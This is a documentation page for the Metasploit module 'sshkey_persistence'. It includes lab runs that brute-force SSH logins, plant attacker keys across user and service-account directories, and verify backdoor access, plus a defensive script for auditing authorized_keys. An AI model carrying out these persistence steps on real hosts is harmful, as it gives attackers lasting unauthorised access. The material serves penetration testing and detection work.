SSH Key Persistence - Metasploit
This page contains detailed information about how to use the post/linux/manage/sshkey_persistence Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SSH Key Persistence
Module: post/linux/manage/sshkey_persistence
Source code: modules/post/linux/manage/sshkey_persistence.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/linux/manage/sshkey_persistence
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > show options
... show and set options ...
msf post(sshkey_persistence) > set SESSION session-id
msf post(sshkey_persistence) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
<ruby>
framework.sessions.each_pair do |sid, session|
  run_single("use post/linux/manage/sshkey_persistence")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
Creating A Testing Environment
This module has been tested against:
- Kali Rolling
- Ubuntu 16.04
- Centos 6
- Fedora 20
- FreeBSD 9
Verification Steps
- Start msfconsole
- Exploit a box via whatever method
- Do: use post/linux/manage/sshkey_persistence
- Do: set session #
- Optional Do: set username
- Do: set verbose true
- Optional Do: set sshd_config
- Do: exploit
Options
SSHD_CONFIG
Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to .ssh/authorized_keys.
USERNAME
If set, we only write our key to this user. If not, we'll write to all users.
PUBKEY
A public key to use. If not provided, a pub/priv key pair is generated automatically.
Scenarios
Ubuntu 16.04 (user level)
Get initial access
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user tiki
user => tiki
msf post(sshkey_persistence) > set CreateSSHFolder true
CreateSSHFolder => true
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /home/tiki/.ssh
[*] Attempting to create ssh folders that don't exist
[+] Storing new private key as /root/.msf4/loot/20160619095250_default_192.168.2.190_id_rsa_425588.txt
[*] Adding key to /home/tiki/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 761 bytes in 1 chunks of 2886 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Verify our access works
msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.190
rhosts => 192.168.2.190
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username tiki
username => tiki
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.190:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/.msf4/loot
[+] SSH - Success: 'tiki:-----BEGIN RSA PRIVATE KEY-----
...snip...
7m+il2AWyuPWOWEnpXRur3knruE2k97ObMH92FeI8SYaIThvqNUL
-----END RSA PRIVATE KEY-----
' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 2 opened (192.168.2.229:42580 -> 192.168.2.190:22) at 2016-06-19 09:56:22 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If you try to run for a user you don't have permissions for
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added: /root/.ssh
[*] Attempting to create ssh folders that don't exist
[+] /root/.ssh
[*] Creating /root/.ssh folder
[-] No users found with a .ssh directory
[*] Post module execution completed
CentOS 6 (user level)
SSH keys must be enabled in sshd_config.
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username user
username => user
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'user:password' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:39289 -> 192.168.4.62:22) at 2016-06-19 15:27:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user user
user => user
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /home/user/.ssh
[*] Attempting to create ssh folders that don't exist
[+] Storing new private key as /root/.msf4/loot/20160619152757_default_192.168.4.62_id_rsa_633695.txt
[*] Creating /home/user/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1447 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Verify our access works
msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username user
username => user
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.4.62:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 6 keys from /root/.msf4/loot
[+] SSH - Success: 'user:-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA8xtiDZrE6XgkOJaatg+TvUcrEr92/GDSZUtEqO9RvvvPO1Yt
...snip...
Ubz5hiBypg1/C2TMB9jH3QLKmT66Te7rfym7rOBIgIJKivs5JLZe7w==
-----END RSA PRIVATE KEY-----
' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 2 opened (192.168.2.229:34721 -> 192.168.4.62:22) at 2016-06-19 15:49:34 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
CentOS 6 (root)
The following sshd_config changes were made:
PubkeyAuthentication yes
AuthorizedKeysFile .sshsecret/.authorized_keys
PermitRootLogin yes
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password pass
password => pass
msf auxiliary(ssh_login) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:pass' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:46420 -> 192.168.4.62:22) at 2016-06-19 15:58:32 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the SSH key. Keep in mind that leaving the user unset (untargeted) while enabling CreateSSHFolder can create MANY folders and files, as can be observed below.
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set CreateSSHFolder true
CreateSSHFolder => true
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .sshsecret/.authorized_keys
[*] Finding .sshsecret directories
[*] Attempting to create ssh folders that don't exist
[*] Creating //.sshsecret folder
[*] Creating /bin/.sshsecret folder
[*] Creating /dev/.sshsecret folder
[*] Creating /etc/abrt/.sshsecret folder
[*] Creating /etc/ntp/.sshsecret folder
[*] Creating /proc/.sshsecret folder
[*] Creating /root/.sshsecret folder
[*] Creating /sbin/.sshsecret folder
[*] Creating /usr/games/.sshsecret folder
[*] Creating /var/adm/.sshsecret folder
[*] Creating /var/cache/rpcbind/.sshsecret folder
[*] Creating /var/empty/saslauth/.sshsecret folder
[*] Creating /var/empty/sshd/.sshsecret folder
[*] Creating /var/ftp/.sshsecret folder
[*] Creating /var/gopher/.sshsecret folder
[*] Creating /var/lib/avahi-autoipd/.sshsecret folder
[*] Creating /var/lib/gdm/.sshsecret folder
[*] Creating /var/lib/hsqldb/.sshsecret folder
[*] Creating /var/lib/mysql/.sshsecret folder
[*] Creating /var/lib/nfs/.sshsecret folder
[*] Creating /var/run/avahi-daemon/.sshsecret folder
[*] Creating /var/run/pulse/.sshsecret folder
[*] Creating /var/spool/lpd/.sshsecret folder
[*] Creating /var/spool/mail/.sshsecret folder
[*] Creating /var/spool/postfix/.sshsecret folder
[*] Creating /var/spool/uucp/.sshsecret folder
[*] Creating /var/www/.sshsecret folder
[+] Storing new private key as /root/.msf4/loot/20160619155920_default_192.168.4.62_id_rsa_271813.txt
[*] Creating //.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Creating /bin/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /dev/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /etc/abrt/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /etc/ntp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Adding key to /home/user/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 761 bytes in 1 chunks of 2910 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /root/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /sbin/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /usr/games/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/adm/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/cache/rpcbind/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/empty/saslauth/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/empty/sshd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/ftp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/gopher/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/avahi-autoipd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/gdm/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/hsqldb/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/mysql/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/nfs/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/run/avahi-daemon/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/run/pulse/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/lpd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/mail/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/postfix/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/uucp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/www/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Post module execution completed
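The root scenario above leaves key files in the home directories of service accounts such as /bin and /var/www. As an added example (not part of the module or of the original page), this Python audit resolves AuthorizedKeysFile the way sshd does and reports key files belonging to non-login accounts, plus any key whose fingerprint is not on an approved list. The function names, sample config, passwd entries and key blobs are constructed for illustration.

```python
import base64
import hashlib
import os
import tempfile

NON_LOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

def authorized_keys_patterns(sshd_config_text):
    """Global AuthorizedKeysFile value; sshd keeps the first one it reads."""
    for raw in sshd_config_text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        keyword = parts[0].lower()      # keywords are case-insensitive
        if keyword == "match":          # conditional overrides are not handled
            break
        if keyword == "authorizedkeysfile" and len(parts) > 1:
            return parts[1:]            # several files may be listed
    return [".ssh/authorized_keys", ".ssh/authorized_keys2"]  # sshd default

def expand(pattern, user, home):
    """Expand %h, %u and %%; relative results are anchored at the home dir."""
    path = (pattern.replace("%%", "\0").replace("%h", home)
            .replace("%u", user).replace("\0", "%"))
    return path if path.startswith("/") else os.path.join(home, path)

def fingerprints(text):
    """Yield the SHA256 fingerprint (ssh-keygen -l form) of every key line."""
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        for i, tok in enumerate(tokens[:-1]):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):  # skip options field
                try:
                    blob = base64.b64decode(tokens[i + 1])
                except ValueError:      # not a key blob after all
                    break
                digest = base64.b64encode(hashlib.sha256(blob).digest())
                yield "SHA256:" + digest.decode().rstrip("=")
                break

def audit(root, sshd_config_text, passwd_text, approved):
    """Return (user, path, reason) for each key file entry that needs review."""
    findings = []
    patterns = [p for p in authorized_keys_patterns(sshd_config_text) if p != "none"]
    for entry in passwd_text.splitlines():
        fields = entry.split(":")
        if len(fields) != 7:
            continue
        user, home, shell = fields[0], fields[5], fields[6]
        for pattern in patterns:
            path = expand(pattern, user, home)
            on_disk = os.path.join(root, path.lstrip("/"))
            if not os.path.isfile(on_disk):
                continue
            if shell in NON_LOGIN_SHELLS:
                findings.append((user, path, "key file for non-login account"))
            with open(on_disk) as fh:
                for fp in fingerprints(fh.read()):
                    if fp not in approved:
                        findings.append((user, path, "unapproved key " + fp))
    return findings

# Constructed sample data: config, passwd entries and key blobs are made up.
SSHD_CONFIG = "PubkeyAuthentication yes\nauthorizedkeysfile .sshsecret/.authorized_keys\n"
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "bin:x:1:1:bin:/bin:/sbin/nologin\n"
          "user:x:500:500::/home/user:/bin/bash\n")
KEY_A = "ssh-rsa " + base64.b64encode(b"constructed key A").decode() + " user@laptop"
KEY_B = "ssh-rsa " + base64.b64encode(b"constructed key B").decode()

def demo():
    """Build a throwaway tree shaped like the scenario above and audit it."""
    with tempfile.TemporaryDirectory() as root:
        for home, body in (("bin", KEY_B), ("home/user", KEY_A + "\n" + KEY_B)):
            folder = os.path.join(root, home, ".sshsecret")
            os.makedirs(folder)
            with open(os.path.join(folder, ".authorized_keys"), "w") as fh:
                fh.write(body + "\n")
        return audit(root, SSHD_CONFIG, PASSWD, set(fingerprints(KEY_A)))

if __name__ == "__main__":
    print("\n".join("  ".join(finding) for finding in demo()))
```

On a real host, call audit("/", ...) with the contents of the sshd_config and passwd files and a set of approved fingerprints taken from `ssh-keygen -lf` output.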
FreeBSD9 (root)
Several sshd_config mods were needed to allow root login, and enable the service to run correctly.
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.130
rhosts => 192.168.2.130
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:password' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64 '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:41724 -> 192.168.2.130:22) at 2016-06-19 22:10:59 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set username root
username => root
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20160619221108_default_192.168.2.130_id_rsa_441694.txt
[*] Creating /root/.ssh/authorized_keys
[*] Max line length is 131073
[*] Writing 380 bytes in 1 chunks of 1461 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Verify our access works
msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.130
rhosts => 192.168.2.130
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username root
username => root
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.130:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 4 keys from /root/.msf4/loot
[+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAqBC5XwkPOAtFn8zCFWIs3IIzUUfMvJPWxQQl1Porf8GiSs2B
...snip...
6aj815iPJp9X5vnIR6mRdTJP9UQraPe6jneicx8QfncfoqJbA2v7
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64 '
[*] Command shell session 2 opened (192.168.2.229:32991 -> 192.168.2.130:22) at 2016-06-19 22:14:16 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Fedora 20 (root)
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:35460 -> 192.168.2.143:22) at 2016-06-19 20:27:53 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user root
user => root
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /root/.ssh
[+] Storing new private key as /root/.msf4/loot/20160619202835_default_192.168.2.143_id_rsa_458964.txt
[*] Creating /root/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1456 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Verify our access works
msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username root
username => root
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.143:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/.msf4/loot
[!] No active DB -- Credential data will not be saved!
[+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAx5LLnAOPzc5KSI/Zd71bdHlexQrIpuASjUIGnJjlJVB9Sfyz
...snip...
vtOaL6/NsfxFDDrCBX72X5tv3rTA4MNzOFTYbCM80Ln6E2TDWgPv
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 2 opened (192.168.2.229:35751 -> 192.168.2.143:22) at 2016-06-19 20:31:23 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Fedora 20 (user level)
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username user
username => user
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'user:password' 'uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:37727 -> 192.168.2.143:22) at 2016-06-19 20:33:45 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set username user
username => user
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20160619203401_default_192.168.2.143_id_rsa_010117.txt
[*] Creating /home/user/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1452 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Msfconsole Usage
Here is how the linux/manage/sshkey_persistence post exploitation module looks in the msfconsole:
msf6 > use post/linux/manage/sshkey_persistence
msf6 post(linux/manage/sshkey_persistence) > show info
Name: SSH Key Persistence
Module: post/linux/manage/sshkey_persistence
Platform: Linux
Arch:
Rank: Excellent
Provided by:
h00die <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
  Name             Current Setting       Required  Description
  ----             ---------------       --------  -----------
  CREATESSHFOLDER  false                 yes       If no .ssh folder is found, create it for a user
  PUBKEY                                 no        Public Key File to use. (Default: Create a new one)
  SESSION                                yes       The session to run this module on.
  SSHD_CONFIG      /etc/ssh/sshd_config  yes       sshd_config file
  USERNAME                               no        User to add SSH key to (Default: all users on box)
Description:
This module will add an SSH key to a specified user (or all), to
allow remote login via SSH at any time.
Module Options
This is a complete list of options available in the linux/manage/sshkey_persistence post exploitation module:
msf6 post(linux/manage/sshkey_persistence) > show options
Module options (post/linux/manage/sshkey_persistence):
  Name             Current Setting       Required  Description
  ----             ---------------       --------  -----------
  CREATESSHFOLDER  false                 yes       If no .ssh folder is found, create it for a user
  PUBKEY                                 no        Public Key File to use. (Default: Create a new one)
  SESSION                                yes       The session to run this module on.
  SSHD_CONFIG      /etc/ssh/sshd_config  yes       sshd_config file
  USERNAME                               no        User to add SSH key to (Default: all users on box)
Advanced Options
Here is a complete list of advanced options supported by the linux/manage/sshkey_persistence post exploitation module:
msf6 post(linux/manage/sshkey_persistence) > show advanced
Module advanced options (post/linux/manage/sshkey_persistence):
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  VERBOSE    false            no        Enable detailed status messages
  WORKSPACE                   no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the linux/manage/sshkey_persistence module can do:
msf6 post(linux/manage/sshkey_persistence) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the linux/manage/sshkey_persistence post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(linux/manage/sshkey_persistence) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Pubkey Authentication disabled
Here is a relevant code snippet related to the "Pubkey Authentication disabled" error message:
    end
    print_status('Checking SSH Permissions')
    sshd_config = read_file(datastore['SSHD_CONFIG'])
    /^PubkeyAuthentication[\s]+(?<pub_key>yes|no)/ =~ sshd_config
    if pub_key && pub_key == 'no'
      print_error('Pubkey Authentication disabled')
    elsif pub_key
      vprint_good("Pubkey set to #{pub_key}")
    end
